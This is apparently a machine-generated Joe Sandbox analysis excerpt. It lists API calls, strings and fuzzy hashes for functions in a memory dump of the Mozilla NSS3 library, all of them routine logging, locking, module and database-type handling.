Part of subcall function 6C6B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6587ED,00000008,?,00000800,6C64EF74,00000000), ref: 6C6B102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C698FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C698FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C77D820,6C699576), ref: 6C698FF9
DER_GetInteger_Util.NSS3(?), ref: 6C69901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C69903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C699062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6990A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C6990CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C6990F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C69912D
free.MOZGLUE(00000000), ref: 6C699136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C699145

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 3dcaa28ba1296a70ee06e1a35efba161481da057beeb6946c9231f0bd5629547
Instruction ID: cc9e516a6502a86337e54dc69d0e1f7cc63ba288f598162578b36d4168f8a15f
Opcode Fuzzy Hash: 3dcaa28ba1296a70ee06e1a35efba161481da057beeb6946c9231f0bd5629547
Instruction Fuzzy Hash: 9251F1B2A042019FEB00CF28DC41B9BB7E8BF99358F044529EC5997741E731E955CB9A

Function 6C764960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C768061,?,?,?,?), ref: 6C76497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C76499E
GetLastError.KERNEL32(?,?,6C768061,?,?,?,?), ref: 6C7649AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C768061,?,?,?,?), ref: 6C7649C2

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C768061,?,?,?,?), ref: 6C7649D6
CreateSemaphoreA.KERNEL32(00000000,6C768061,7FFFFFFF,?), ref: 6C764A19
GetLastError.KERNEL32(?,?,?,?,6C768061,?,?,?,?), ref: 6C764A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C768061,?,?,?,?), ref: 6C764A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C768061,?,?,?,?), ref: 6C764A52
GetLastError.KERNEL32(?,?,?,?,6C768061,?,?,?,?), ref: 6C764A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C768061,?,?,?,?), ref: 6C764A6A
CreateSemaphoreA.KERNEL32(?,6C768061,7FFFFFFF,?), ref: 6C764A9A
free.MOZGLUE(?,?,?,?,?,6C768061,?,?,?,?), ref: 6C764AAE
free.MOZGLUE(?,?,?,?,?,6C768061,?,?,?,?), ref: 6C764AC2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 65a0fa2f823490febefb2fdb7df5d59cd5083b210174ca1bada396decf6a4b97
Instruction ID: 4f7cdbb4d76a7a5eaf7792052ab9d9f14e8ecfa2e9f085ac1479e86ca67e0206
Opcode Fuzzy Hash: 65a0fa2f823490febefb2fdb7df5d59cd5083b210174ca1bada396decf6a4b97
Instruction Fuzzy Hash: F041C370B40205BBDF00EFE99E49B9E7BB8BB4A359F140134FD1AA2A40DB3199048765

Function 6C68ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C68ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C68AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AE29

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C68AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C68AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C68AEA0

Strings

(CK_INVALID_HANDLE), xrefs: 6C68AE1F, 6C68AE80
C_MessageSignInit, xrefs: 6C68ADE1
hKey = 0x%x, xrefs: 6C68AE62, 6C68AE72
hSession = 0x%x, xrefs: 6C68AE01, 6C68AE11
nvl, xrefs: 6C68AEB8, 6C68AEE6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nvl
API String ID: 332880674-3036463336
Opcode ID: 6f93ab5d4f536379bbe1cf368851be28c70bba7a869e4d46329c8a88744a6c96
Instruction ID: b1f9696cb3354686915813e62beb135d3fc7df5ed0a10a026cef5fb02f6d1805
Opcode Fuzzy Hash: 6f93ab5d4f536379bbe1cf368851be28c70bba7a869e4d46329c8a88744a6c96
Instruction Fuzzy Hash: CA31EB71602208ABCB009F14DD4CFAA3775AB4630DF044834ED09ABB92DB309909DBBE

Function 6C682DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C682DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C682E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C682E33

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C682E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C682E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C682E81

Strings

(CK_INVALID_HANDLE), xrefs: 6C682E2C
C_InitPIN, xrefs: 6C682DF1
hSession = 0x%x, xrefs: 6C682E0E, 6C682E1E
pPin = 0x%p, xrefs: 6C682E63
ulPinLen = %d, xrefs: 6C682E7C
nvl, xrefs: 6C682E99, 6C682EC4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nvl
API String ID: 1003633598-921645966
Opcode ID: 8c643f37c48795138967a83f2fb075706d764ebd002dffc4f033cf70639d0dc1
Instruction ID: 54288f16d8b6405a2c04b4dc9760ccf5b39bb468fcb0ce6a0f6260b157164ecb
Opcode Fuzzy Hash: 8c643f37c48795138967a83f2fb075706d764ebd002dffc4f033cf70639d0dc1
Instruction Fuzzy Hash: 7731E275602218ABDB109F55DE4CF8A3BB5EB4635CF084034E809ABB51DB309949CBBE

Function 6C686EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C686F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C686F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C686F53

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C686F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C686F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C686FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6C686F4C
pPart = 0x%p, xrefs: 6C686F83
C_DigestUpdate, xrefs: 6C686F11
hSession = 0x%x, xrefs: 6C686F2E, 6C686F3E
nvl, xrefs: 6C686FB9, 6C686FE7
ulPartLen = %d, xrefs: 6C686F9C

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nvl
API String ID: 1003633598-2481572597
Opcode ID: 92f62b0c1d33039453350fe174feaafaf8966d4d4f12565d812765df1d333df0
Instruction ID: d35bc0d0a244ac99e0fa54c0c7c61c7918020506b830ad2bbd48e3b9cb85113c
Opcode Fuzzy Hash: 92f62b0c1d33039453350fe174feaafaf8966d4d4f12565d812765df1d333df0
Instruction Fuzzy Hash: AB31C475612158AFDB009F15DE4CF8A3BB2AB4235DF084035E909ABA51DB30D948CBBE

Function 6C76C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C76C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C76C8DA
malloc.MOZGLUE(00000001), ref: 6C76C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C76C8F8
PR_NewLock.NSS3 ref: 6C76C909
PR_NewCondVar.NSS3(00000000), ref: 6C76C918
PR_NewCondVar.NSS3(00000000), ref: 6C76C92A

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

free.MOZGLUE(00000000), ref: 6C76C947

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: ebb944b4213f9f902ac541cf5ada80c71160832e126128e1af38cc35ccb8e3b4
Instruction ID: bf5db6780d560fd2f56a5c9787cd6db98070dbfb879978039ac602608777c9d9
Opcode Fuzzy Hash: ebb944b4213f9f902ac541cf5ada80c71160832e126128e1af38cc35ccb8e3b4
Instruction Fuzzy Hash: 1A21C8B1A007026BEF106FBA9D0965B7AB8AF0135AF140439EC5BC6F00EB31D514C7A6

Function 6C64AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C64AF47

Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190AB
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190C9
Part of subcall function 6C719090: EnterCriticalSection.KERNEL32 ref: 6C7190E5
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C719116
Part of subcall function 6C719090: LeaveCriticalSection.KERNEL32 ref: 6C71913F

FreeLibrary.KERNEL32(?), ref: 6C64AF6D
free.MOZGLUE(?), ref: 6C64AFA4
free.MOZGLUE(?), ref: 6C64AFAA
PR_ExitMonitor.NSS3 ref: 6C64AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C64AFF5
PR_ExitMonitor.NSS3 ref: 6C64B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C64B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C64B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C64B03C

Strings

%s decr => %d, xrefs: 6C64AFF0
Unloaded library %s, xrefs: 6C64B023

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 85e0e32acd37585fb4923a3489073608a21f022ec7ee8fb132514757a798e274
Instruction ID: 4052977f948da2556666b9c4f95db5b8d006a66feda73761434380debadff623
Opcode Fuzzy Hash: 85e0e32acd37585fb4923a3489073608a21f022ec7ee8fb132514757a798e274
Instruction Fuzzy Hash: 473103B4A04101BBEB009F61DC48E5AB775EB4670DB18C135EC0687A41F722E824C7AD

Function 6C696C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C69781D,00000000,6C68BE2C,?,6C696B1D,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?), ref: 6C696C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C696C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C696C96

Part of subcall function 6C641240: TlsGetValue.KERNEL32(00000040,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641267
Part of subcall function 6C641240: EnterCriticalSection.KERNEL32(?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C64127C
Part of subcall function 6C641240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641291
Part of subcall function 6C641240: PR_Unlock.NSS3(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C6412A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C696CAA

Strings

dbm, xrefs: 6C696CA4
sql:, xrefs: 6C696C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C696C91
extern:, xrefs: 6C696C7E
dbm:, xrefs: 6C696C3A
rdb:, xrefs: 6C696C69

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: c196fb9460011e818bc2b35c1378a8d3b495fdd042ff49280a1e2b73dd4b63e2
Instruction ID: 0fe2c62c29fcbf0ef25a135404f7e84b729a72df7edb3cf82263d452de9dfbd1
Opcode Fuzzy Hash: c196fb9460011e818bc2b35c1378a8d3b495fdd042ff49280a1e2b73dd4b63e2
Instruction Fuzzy Hash: D301A2A170630277FA4027BA7E4AF66355C9F41259F144531FE04E0981EB92E61480E9

Function 6C6D8910 Relevance: 19.8, APIs: 13, Instructions: 304threadmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6CA9D0: PR_SetError.NSS3(00000000,00000000), ref: 6C6CAA14

PR_GetCurrentThread.NSS3 ref: 6C6D8A52
PR_SetError.NSS3(FFFFD01F,00000000), ref: 6C6D8A92
PORT_Alloc_Util.NSS3(?), ref: 6C6D8B3B
memcpy.VCRUNTIME140(?,?,?), ref: 6C6D8B90
free.MOZGLUE(?), ref: 6C6D8BB6
PR_GetCurrentThread.NSS3 ref: 6C6D8BC7
PR_GetCurrentThread.NSS3 ref: 6C6D8C28
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C6D8C57
PORT_NewArena_Util.NSS3(00000800), ref: 6C6D8C75
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C6D8C89
memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6D8CA2
PR_GetCurrentThread.NSS3 ref: 6C6D8CC5
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6D8CF6

Part of subcall function 6C6CAB00: PR_SetError.NSS3(00000000,00000000,?,?,?), ref: 6C6CAB5F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CurrentErrorThreadUtil$Alloc_Arena_$ArenaFreefreememcpymemset
String ID:
API String ID: 3570957031-0
Opcode ID: 2ddbfe889c97c05ad0a5daf79bd31ca9c8309398fe91c356f8c96146b2230d9a
Instruction ID: e8aca98c947d7d306cb3b92d9dbbd8ef49b503227ab9349f082f88162d9349db
Opcode Fuzzy Hash: 2ddbfe889c97c05ad0a5daf79bd31ca9c8309398fe91c356f8c96146b2230d9a
Instruction Fuzzy Hash: FEB109B1905301ABD710CF24CC84BAB77E8EF89348F05556AF9498B762E731EA44C7D6

Function 6C6A4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C6678F8), ref: 6C6A4E6D

Part of subcall function 6C6409E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6406A2,00000000,?), ref: 6C6409F8
Part of subcall function 6C6409E0: malloc.MOZGLUE(0000001F), ref: 6C640A18
Part of subcall function 6C6409E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C640A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6678F8), ref: 6C6A4ED9

Part of subcall function 6C695920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C697703,?,00000000,00000000), ref: 6C695942
Part of subcall function 6C695920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C697703), ref: 6C695954
Part of subcall function 6C695920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C69596A
Part of subcall function 6C695920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C695984
Part of subcall function 6C695920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C695999
Part of subcall function 6C695920: free.MOZGLUE(00000000), ref: 6C6959BA
Part of subcall function 6C695920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6959D3
Part of subcall function 6C695920: free.MOZGLUE(00000000), ref: 6C6959F5
Part of subcall function 6C695920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C695A0A
Part of subcall function 6C695920: free.MOZGLUE(00000000), ref: 6C695A2E
Part of subcall function 6C695920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C695A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4EB3

Part of subcall function 6C6A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6A4EB8,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A484C
Part of subcall function 6C6A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6A4EB8,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A486D
Part of subcall function 6C6A4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6A4EB8,?), ref: 6C6A4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4EC0

Part of subcall function 6C6A4470: TlsGetValue.KERNEL32(00000000,?,6C667296,00000000), ref: 6C6A4487
Part of subcall function 6C6A4470: EnterCriticalSection.KERNEL32(?,?,?,6C667296,00000000), ref: 6C6A44A0
Part of subcall function 6C6A4470: PR_Unlock.NSS3(?,?,?,?,6C667296,00000000), ref: 6C6A44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C77DCB0,00000000), ref: 6C6A4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C6A501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A506B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 306bf7aacf141ee09f79a1ecf42902009a74b359ca8103d0047559dbe89b2749
Instruction ID: 92bd4522a208fcd338fb28edf80d380f17c0a449611768c9f1f27572a16d81e7
Opcode Fuzzy Hash: 306bf7aacf141ee09f79a1ecf42902009a74b359ca8103d0047559dbe89b2749
Instruction Fuzzy Hash: 8D5124B1D00602ABEB019FA5EC01AAA76B4FF0635CF144535E80682A11FB71DD56CB9E

Function 6C76ABB0 Relevance: 19.7, APIs: 13, Instructions: 173COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C76ABD5
_PR_MD_UNLOCK.NSS3(?), ref: 6C76AC21

